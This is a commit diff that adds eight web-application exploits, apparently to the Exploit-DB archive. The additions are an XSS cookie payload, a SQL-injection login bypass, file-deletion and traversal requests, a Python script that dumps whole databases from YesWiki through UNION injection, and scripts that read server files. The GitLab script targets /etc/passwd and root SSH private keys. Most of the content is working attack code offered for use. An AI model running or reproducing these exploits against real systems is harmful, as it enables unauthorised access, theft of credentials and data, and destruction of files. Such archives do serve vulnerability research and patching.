DB: 2020-05-07

8 changes to exploits/shellcodes Online Clothing Store 1.0 - Persistent Cross-Site Scripting i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion Booked Scheduler 2.7.7 - Authenticated Directory Traversal Online Clothing Store 1.0 - 'username' SQL Injection webTareas 2.0.p8 - Arbitrary File Deletion GitLab 12.9.0 - Arbitrary File Read YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection MPC Sharj 3.11.1 - Arbitrary File Download
2020-05-07 05:01:48 +00:00 · 2020-05-07 05:01:48 +00:00 · 81205fc37a
commit 81205fc37a
parent cc95715dc2
9 changed files with 651 additions and 0 deletions
--- a/exploits/php/webapps/48426.txt
+++ b/exploits/php/webapps/48426.txt
@ -0,0 +1,21 @@
+#  Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting
+#  Date: 2020-05-05
+#  Exploit Author: Sushant Kamble
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#Vulnerable Page: Offers.php
+#Parameter Vulnerable: Offer Detail
+
+ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS
+
+Admin user can add malicious script to offer page.
+when a normal user visit a page. A script gets executed.
+
+# Exploit:
+	Open offer.php
+	Add below script in Offer Detail
+		<script>alert(document.cookie)</script>
+	Save
--- a/exploits/php/webapps/48427.txt
+++ b/exploits/php/webapps/48427.txt
@ -0,0 +1,34 @@
+# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
+# Date: 2020-05-02
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.i-doit.org/
+# Software Link: https://sourceforge.net/projects/i-doit/
+# Version: v1.14.1
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+--------------------------------------------------------------------------------------------------
+
+Vulnerable Module ---> Import Module
+Vulnerable parameter ---> delete_import
+-----------
+PoC
+-----------
+
+POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ******************************
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2
+X-Requested-With: XMLHttpRequest
+X-Prototype-Version: 1.7.3
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+X-i-doit-Tenant-Id: 1
+Content-Length: 30
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=bf21********************************68b8
+
+delete_import=Type the filename, you want to delete from the server here
--- a/exploits/php/webapps/48428.txt
+++ b/exploits/php/webapps/48428.txt
@ -0,0 +1,32 @@
+# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
+# Date: 2020-05-03
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.bookedscheduler.com
+# Software Link: https://sourceforge.net/projects/phpscheduleit/
+# Version: v2.7.7
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+Description:
+----------------------------------------------------------
+Vulnerable Parameter: $tn
+Vulnerable File: manage_email_templates.php
+
+
+PoC
+-----------
+
+GET
+/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***************************
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/booked/Web/admin/manage_email_templates.php
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
+PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
--- a/exploits/php/webapps/48429.txt
+++ b/exploits/php/webapps/48429.txt
@ -0,0 +1,27 @@
+# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /online%20Clothing%20Store/login.php HTTP/1.1 
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/online%20Clothing%20Store/
+Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7
+Upgrade-Insecure-Requests: 1
+
+txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login
--- a/exploits/php/webapps/48430.txt
+++ b/exploits/php/webapps/48430.txt
@ -0,0 +1,75 @@
+# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
+# Date: 2020-05-02
+# Author: Besim ALTINOK
+# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
+# Software Link: https://sourceforge.net/projects/webtareas/files/
+# Version: v2.0.p8
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+
+Description:
+--------------------------------------------------------------------------------------
+
+- print_layout.php is vulnerable. When you sent PoC code to the server and
+If there is no file on the server, you can see, this error message
+
+<br />
+<b>Warning</b>:
+ unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip):
+No such file or directory in
+<b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b>
+on line <b>1303</b><br />
+
+- So, Here, you can delete file with unlink function.
+- And, I ddi try again with another file, I deleted from the server.
+--------------------------------------------------------------------------------------------
+
+Arbitrary File Deletion PoC
+---------------------------------------------------------------------------------------
+
+POST
+/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
+Content-Type: multipart/form-data;
+boundary=---------------------------3678767312987982041084647942
+Content-Length: 882
+DNT: 1
+Connection: close
+Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
+PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="action"
+
+edit
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="desc"
+
+<p>tester</p>
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="attnam1"
+
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="atttmp1"
+
+--add the delete file name here--
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="sp"
+
+
+-----------------------------3678767312987982041084647942--
--- a/exploits/php/webapps/48432.txt
+++ b/exploits/php/webapps/48432.txt
@ -0,0 +1,134 @@
+# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
+# Date: 2020-04-25
+# Exploit Author: coiffeur
+# Vendor Homepage: https://yeswiki.net/
+# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
+# Version: YesWiki cercopitheque < 2020-04-18-1
+
+import sys
+
+import requests
+
+DEBUG = 0
+
+
+def usage():
+    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
+SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]...
+DESCRIPTION:
+    -lt, list tables.
+    -dt <TABLE>, dump table.
+AUTHOR: coiffeur
+    """
+    print(banner)
+
+
+def parse(text):
+    deli_l = 'ABCAABBCC|'
+    deli_r = '|ABCAABBCC'
+    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
+        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
+        exit(-1)
+    start = text.find(deli_l) + len(deli_l)
+    end = start + text[start::].find(deli_r)
+    return text[start:end]
+
+
+def render(elements):
+    print(elements)
+
+def get_count(t_type, table_name=None, column_name=None):
+    if t_type == 'table':
+        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
+        if DEBUG > 1:
+            print(f'[DEBUG] {payload}')
+        r = requests.get(url=f'{sys.argv[1]}{payload}')
+        if r.status_code == 200:
+            data = parse(r.text)
+    if t_type == 'column':
+        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
+        if DEBUG > 1:
+            print(f'[DEBUG] {payload}')
+        r = requests.get(url=f'{sys.argv[1]}{payload}')
+        data = parse(r.text)
+    if t_type == 'element':
+        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
+        if DEBUG > 1:
+            print(f'[DEBUG] {payload}')
+        r = requests.get(url=f'{sys.argv[1]}{payload}')
+        data = parse(r.text)
+    return int(data)
+
+
+def list_tables():
+    tables_count = get_count(t_type='table')
+    print(f'[+] Tables found: {tables_count}')
+
+    tables = []
+    for i in range(0, tables_count):
+        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
+        if DEBUG > 1:
+            print(f'[DEBUG] {payload}')
+        r = requests.get(url=f'{sys.argv[1]}{payload}')
+        if r.status_code == 200:
+            talbe = parse(r.text)
+            print(f'\t{talbe}')
+            tables.append(talbe)
+    return tables
+
+
+def list_columns(table_name):
+    columns_count = get_count(t_type='column', table_name=table_name)
+    print(f'[+] Columns found: {columns_count}')
+
+    columns = []
+    for i in range(0, columns_count):
+        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
+        if DEBUG > 1:
+            print(f'[DEBUG] {payload}')
+        r = requests.get(url=f'{sys.argv[1]}{payload}')
+        if r.status_code == 200:
+            column = parse(r.text)
+            if DEBUG > 0:
+                print(f'\t{column}')
+            columns.append(column)
+    return columns
+
+
+def dump_table(name):
+    columns = list_columns(name)
+    elements = [None]*len(columns)
+    for i in range(0, len(columns)):
+        elements_count = get_count(
+            t_type='element', table_name=name, column_name=columns[i])
+        if DEBUG > 0:
+            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
+        element = []
+        for j in range(0, elements_count):
+            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
+            if DEBUG > 1:
+                print(f'[DEBUG] {payload}')
+            r = requests.get(url=f'{sys.argv[1]}{payload}')
+            if r.status_code == 200:
+                element.append(parse(r.text))
+                if DEBUG > 0:
+                    print(f'\t{element[-1]}')
+        elements[i] = element
+    render(elements)
+    return elements
+
+
+def main():
+    if len(sys.argv) < 3:
+        print(usage())
+        exit(-1)
+
+    if sys.argv[2] == '-lt':
+        list_tables()
+
+    if sys.argv[2] == '-dt':
+        dump_table(sys.argv[3])
+
+
+if __name__ == "__main__":
+    main()
--- a/exploits/php/webapps/48433.txt
+++ b/exploits/php/webapps/48433.txt
@ -0,0 +1,69 @@
+# Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download
+# Exploit Author : SajjadBnd
+# Date : 2020-05-02
+# Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip
+# Tested on : Ubuntu 19.10
+# Version : 3.11.1 Beta
+############################
+#
+# [ DESCRIPTION ]
+#
+# MPC Sharj is a free open source script for creating sim card credit card's shop.
+#
+# [POC]
+#
+# Vulnerable file: download.php
+# parameter : GET/ "id"
+# 69: readfile readfile($file);
+# 55: $file = urldecode(base64_decode(strrev($file)));
+# 53: $file = trim(strip_tags($_GET['id']));
+#
+# payload : [
+# Steps:
+#
+# 1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=)
+# 2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L)
+# 3. your payload is ready ;D
+# http://localhost/download.php?id==Q2dzNXYw9yY0V2L
+#
+#]
+#
+
+import requests
+import os
+from base64 import b64encode
+
+def clear():
+linux = 'clear'
+windows = 'cls'
+os.system([linux, windows][os.name == 'nt'])
+
+def banner():
+print '''
+##############################################################
+##############################################################
+#### # ######### # #### ######### #####
+#### ### ###### ## #### ###### #### ############# #####
+#### #### #### ### #### ###### #### ###################
+#### ##### ## #### #### ####### ###################
+#### ###### ##### #### ############ ###################
+#### ############### #### ############ ############# #####
+#### ############### #### ##666######### ######
+##############################################################
+##############################################################
+###### MPC Sharj 3.11.1 Beta - Arbitrary File Download #####
+##############################################################
+'''
+
+def exploit():
+target = raw_input('[+] Target(http://example.com) => ')
+read_file = raw_input('[+] File to Read => ')
+read_file = b64encode(read_file)
+target = target+"/download.php?id"+read_file[::-1]
+r = requests.get(target,timeout=500)
+print "\n"+r.text
+
+if __name__ == '__main__':
+clear()
+banner()
+exploit()
--- a/exploits/ruby/webapps/48431.txt
+++ b/exploits/ruby/webapps/48431.txt
@ -0,0 +1,251 @@
+# Exploit Title: GitLab 12.9.0 - Arbitrary File Read 
+# Google Dork: -
+# Date: 2020-05-03
+# Exploit Author: KouroshRZ
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Ubuntu 18.04 (but it's OS independent)
+# CVE : -
+
+#####################################################################################################
+#                                                                                                   #			
+# Copyright (c) 2020, William Bowling of Biteable, a.k.a vakzz                                      #
+# All rights reserved.                                                                              #
+#                                                                                                   #
+# Redistribution and use in source and compiled forms, with or without modification, are permitted  #
+# provided that the following conditions are met:                                                   #
+#                                                                                                   #
+#     * Redistributions of source code must retain the above copyright notice, this list of         # 
+# conditions and the following disclaimer.                                                          #
+#                                                                                                   #
+#     * Redistributions in compiled form must reproduce the above copyright notice, this list of    #
+# conditions and the following disclaimer in the documentation and/or other materials provided      #
+# with the distribution.                                                                            #
+#                                                                                                   #
+#     * Neither the name of William Bowling nor the names of Biteable, a.k.a vakzz may be used to   #
+# endorse or promote products derived from this software without specific prior written permission. #
+#                                                                                                   #
+##################################################################################################### 
+
+# Exploit Title: automated exploit for Arbitrary file read via the UploadsRewriter when moving and issue in private gitlab server
+# Google Dork: -
+# Date: 05/03/2020
+# Exploit Author: KouroshRZ
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Ubuntu 18.04 (but it's OS independent)
+# CVE : -
+
+import requests
+import json
+from time import sleep
+
+# For debugging
+proxies = {
+    'http' : '127.0.0.1:8080',
+    'https' : '127.0.0.1:8080'
+}
+
+session = requests.Session()
+
+# config
+host = 'http[s]://<gitlab-address>'
+username = '<you-gitlab-username>'
+password = '<your-gitlab-password>'
+lastIssueUrl = ""
+
+def loginToGitLab(username, password):
+
+    initLoginUrl = '{}/users/sign_in'.format(host)
+
+    initLoginResult = session.get(initLoginUrl).text
+
+    temp_index_csrf_param_start = initLoginResult.find("csrf-param")
+    temp_index_csrf_param_end = initLoginResult.find("/>", temp_index_csrf_param_start)
+    csrf_param = initLoginResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+    temp_index_csrf_token_start = initLoginResult.find("csrf-token")
+    temp_index_csrf_token_end = initLoginResult.find("/>", temp_index_csrf_token_start)
+    csrf_token = initLoginResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+    submitLoginUrl = '{}/users/auth/ldapmain/callback'.format(host)
+
+    submitLoginData = {
+        'utf8=' : '✓',
+        csrf_param : csrf_token,
+        'username' : username,
+        'password' : password,
+    }
+
+    submitLoginResult = session.post(submitLoginUrl, submitLoginData, allow_redirects=False)
+    
+    if submitLoginResult.status_code == 302 and submitLoginResult.text.find('redirected') > -1:
+        print("[+] You'e logged in ...")
+
+
+def createNewProject(projectName):
+
+
+    initProjectUrl = '{}/projects/new'.format(host)
+
+    initProjectResult = session.get(initProjectUrl).text
+
+    temp_index_csrf_param_start = initProjectResult.find("csrf-param")
+    temp_index_csrf_param_end = initProjectResult.find("/>", temp_index_csrf_param_start)
+    csrf_param = initProjectResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+    temp_index_csrf_token_start = initProjectResult.find("csrf-token")
+    temp_index_csrf_token_end = initProjectResult.find("/>", temp_index_csrf_token_start)
+    csrf_token = initProjectResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+    tmp_index_1 = initProjectResult.find('{}/{}/\n'.format(host, username))
+    tmp_index_2 = initProjectResult.find('value', tmp_index_1)
+    tmp_index_3 = initProjectResult.find('type', tmp_index_2)
+    namespace = initProjectResult[tmp_index_2 + 7 : tmp_index_3 - 2]
+
+    createProjectUrl = '{}/projects'.format(host)
+    createProjectData = {
+        'utf8=' : '✓',
+        csrf_param : csrf_token,
+        'project[ci_cd_only]' : 'false',
+        'project[name]' : projectName,
+        'project[namespace_id]' : namespace,
+        'project[path]' : projectName,
+        'project[description]' : '',
+        'project[visibility_level]' : '0'
+    }
+
+    createProjectResult = session.post(createProjectUrl, createProjectData, allow_redirects=False)
+    
+    if createProjectResult.status_code == 302:
+
+        print("[+] New Project {} created ...".format(projectName))
+
+def createNewIssue(projectName, issueTitle, file):
+
+    global lastIssueUrl
+
+    initIssueUrl = '{}/{}/{}/-/issues/new'.format(host, username, projectName)
+
+    initIssueResult = session.get(initIssueUrl).text
+
+    temp_index_csrf_param_start = initIssueResult.find("csrf-param")
+    temp_index_csrf_param_end = initIssueResult.find("/>", temp_index_csrf_param_start)
+    csrf_param = initIssueResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+    temp_index_csrf_token_start = initIssueResult.find("csrf-token")
+    temp_index_csrf_token_end = initIssueResult.find("/>", temp_index_csrf_token_start)
+    csrf_token = initIssueResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+    createIssueUrl = '{}/{}/{}/-/issues'.format(host , username, projectName)
+
+    createIssueData = {
+        'utf8=' : '✓',
+        csrf_param : csrf_token,
+        'issue[title]' : issueTitle,
+        'issue[description]' : '![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})'.format(file),
+        'issue[confidential]' : '0',
+        'issue[assignee_ids][]' : '0',
+        'issue[label_ids][]' : '',
+        'issue[due_date]' : '',
+        'issue[lock_version]' : '0'
+    }
+
+    createIssueResult = session.post(createIssueUrl, createIssueData, allow_redirects=False)
+
+    if createIssueResult.status_code == 302:
+
+        print("[+] New issue for {} created ...".format(projectName))
+        tmp_index_1 = createIssueResult.text.find("href")
+        tmp_index_2 = createIssueResult.text.find("redirected")
+        lastIssueUrl = createIssueResult.text[tmp_index_1 + 6: tmp_index_2 - 2]
+        print("[+] url of craeted issue : {}\n".format(lastIssueUrl))
+
+def moveLastIssue(source, destination, file):
+
+    # Get destination project ID
+
+    getProjectIdUrl = '{}/{}/{}'.format(host, username, destination)
+    getProjectIdResult = session.get(getProjectIdUrl).text
+
+    tmpIndex = getProjectIdResult.find('/search?project_id')
+    projectId = getProjectIdResult[tmpIndex + 19 : tmpIndex + 21]
+    #print("Project : {} ID ----> {}\n".format(destination, projectId))
+
+    # Get CSRF token for moving issue
+    # initIssueMoveUrl = '{}/{}/{}/-/issues/{}'.format(host, username, source, issue)
+    initIssueMoveUrl = lastIssueUrl
+    initIssueMoveResult = session.get(initIssueMoveUrl).text
+
+    temp_index_csrf_token_start = initIssueMoveResult.find("csrf-token")
+    temp_index_csrf_token_end = initIssueMoveResult.find("/>", temp_index_csrf_token_start)
+    csrf_token = initIssueMoveResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+    # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+    # Move issue with associated CSRF token
+    # moveIssueUrl = "{}/{}/{}/-/issues/{}/move".format(host, username, source, issue)
+    moveIssueUrl = lastIssueUrl + "/move"
+    moveIssueData = json.dumps({
+        "move_to_project_id" : int(projectId)
+    })
+    headers = {
+        'X-CSRF-Token' : csrf_token,
+        'X-Requested-With' : 'XMLHttpRequest',
+        'Content-Type' : 'application/json;charset=utf-8'
+    }
+    moveIssueResult = session.post(moveIssueUrl, headers = headers, data = moveIssueData, allow_redirects = False)
+
+    if moveIssueResult.status_code == 500:
+        print("[!] Permission denied for {}".format(file))
+    else:
+        description = json.loads(moveIssueResult.text)["description"]
+        tmp_index = description.find("/")
+        fileUrl = "{}/{}/{}/{}".format(host, username, destination, description[tmp_index+1:-1])
+
+        print("[+] url of file {}: \n".format(f, fileUrl))
+        fileContentResult = session.get(fileUrl)
+
+        if fileContentResult.status_code == 404:
+            print("[-] No such file or directory : {}".format(f))
+        else:
+            print("[+] Content of file {} read from server ...\n\n".format(f))
+            print(fileContentResult.text)
+	    
+    print("\n****************************************************************************************\n")
+
+
+
+if __name__ == "__main__":
+
+    loginToGitLab(username, password)
+
+    createNewProject("project_01")
+    createNewProject("project_02")
+
+    # Put the files you want to read from server here
+	# The files on server should have **4 or more permission (world readable files)
+    files = {
+        '/etc/passwd',
+        '/etc/ssh/sshd_config',
+        '/etc/ssh/ssh_config',
+        '/root/.ssh/id_rsa',
+        '/var/log/auth.log'
+		# ...
+		# ...
+		# ...
+    } 
+
+    
+    for f in files:
+        createNewIssue("project_01", "issue01_{}".format(f), f)
+        moveLastIssue("project_01", "project_02",f)
+        sleep(3)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -42658,3 +42658,11 @@ id,file,description,date,author,type,platform,port
 48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php,
 48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,
 48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware,
+48426,exploits/php/webapps/48426.txt,"Online Clothing Store 1.0 - Persistent Cross-Site Scripting",2020-05-06,"Sushant Kamble",webapps,php,
+48427,exploits/php/webapps/48427.txt,"i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,
+48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,
+48429,exploits/php/webapps/48429.txt,"Online Clothing Store 1.0 - 'username' SQL Injection",2020-05-06,"Sushant Kamble",webapps,php,
+48430,exploits/php/webapps/48430.txt,"webTareas 2.0.p8 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,
+48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
+48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
+48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,